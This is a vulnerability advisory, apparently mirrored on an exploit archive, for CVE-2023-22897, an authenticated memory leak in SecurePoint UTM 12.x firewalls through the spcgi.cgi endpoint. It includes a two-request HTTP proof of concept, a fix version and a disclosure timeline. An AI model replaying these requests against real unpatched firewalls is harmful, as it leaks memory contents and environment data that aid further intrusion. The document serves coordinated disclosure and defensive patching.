what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SecurePoint UTM 12.x Memory Leak

SecurePoint UTM 12.x Memory Leak
Posted Apr 18, 2023
Authored by Julien Ahrens | Site rcesecurity.com

SecurePoint UTM versions 12.x suffers from a memory leak vulnerability via the spcgi.cgi endpoint.

tags | exploit, cgi, memory leak
advisories | CVE-2023-22897
SHA-256 | 15ddc40a5043fe4407a10fa673fb39fdb12a08b717f9167e70ad626fbe024350

SecurePoint UTM 12.x Memory Leak

Change Mirror Download
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product: SecurePoint UTM
Vendor URL: https://www.securepoint.de/en/for-companies/firewall-vpn
Type: Use of Uninitialized Variable [CWE-457]
Date found: 2023-01-05
Date published: 2023-04-12
CVSSv3 Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CVE: CVE-2023-22897


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
SecurePoint UTM 12.2.5
SecurePoint UTM 12.2.5
SecurePoint UTM 12.2.4.1
SecurePoint UTM 12.2.4
SecurePoint UTM 12.2.3.4
SecurePoint UTM 12.2.3.3
SecurePoint UTM 12.2.3.2 Reseller Preview
SecurePoint UTM 12.2.3.1 Reseller Preview


4. INTRODUCTION
===============
With secure networks, home office, site connectivity and the protection of your
data are easy to implement. UTM firewalls and VPN gateways from Securepoint secure
your networks - with suitable IT security solutions for small and medium-sized
businesses for rent, purchase or as a complete service.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The firewall offers an administrative web panel on port 11115 and a user login
panel on port 443. Both use the endpoint at "/spcgi.cgi" to perform authentication
checks via the "login" command. Once authentication is successful (a low-privileged
user account is sufficient), and the returned "sessionid" has never been used in
any subsequent request, then the application will return remote memory contents
within the sessionid JSON attribute on all subsequent requests (that don't contain
the sessionId, hence referring to as "unused"). The leaked memory contents include
memory addresses as well as environment variables.

This happens because the application doesn't correctly initialize a variable later
used in the JSON output referencing the sessionid.

Successful exploits can allow an authenticated attacker to leak memory contents,
which might contain sensitive information, and help defeat memory protections such
as ASLR.


6. PROOF OF CONCEPT
===================
First, authenticate using any legitimate user against either the admin panel on port
11115 or the user panel on port 443 by using a single HTTP POST request like the
following:

POST /spcgi.cgi HTTP/1.1
Host: 192.168.175.1
Content-Length: 100
Accept: */*
Content-Type: application/json; charset=UTF-8
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"user","pass":"Password"}}

This returns a sessionid, which you must not use in subsequent requests. This is
important because the exploit won't work if you authenticate using the web interface
because the sessionid is immediately "used" in further requests being issued by the
application.

Then submit any JSON request without a sessionid against the same endpoint, such as:

POST /spcgi.cgi HTTP/1.1
Host: 192.168.175.1
Content-Length: 2
Accept: */*
Content-Type: application/json; charset=UTF-8
User-Agent: test
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

{}

The remote memory contents are afterward leaked in response to that request within
the sessionid JSON attribute.


7. SOLUTION
===========
Upgrade to version 12.2.5.1 or newer


8. REPORT TIMELINE
==================
2023-01-04: Discovery of the vulnerability
2023-01-06: Contacted vendor via a known contact
2023-01-06: Vendor response
2023-01-06: Sent full vulnerability details to vendor
2023-01-06: Vendor acknowledged the vulnerability
2023-01-06: Vendor asks to set the disclosure date to 2023-04-11 due to the # of affected customers
2023-01-06: RCE Security agrees to the proposed disclosure date
2023-01-06: Vendor publishes hotfix 12.2.5.1 which fixes the vulnerability
2023-01-10: MITRE assigns CVE-2023-22897
2023-04-12: Public disclosure


9. REFERENCES
==============
https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/
https://github.com/MrTuxracer/advisories
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close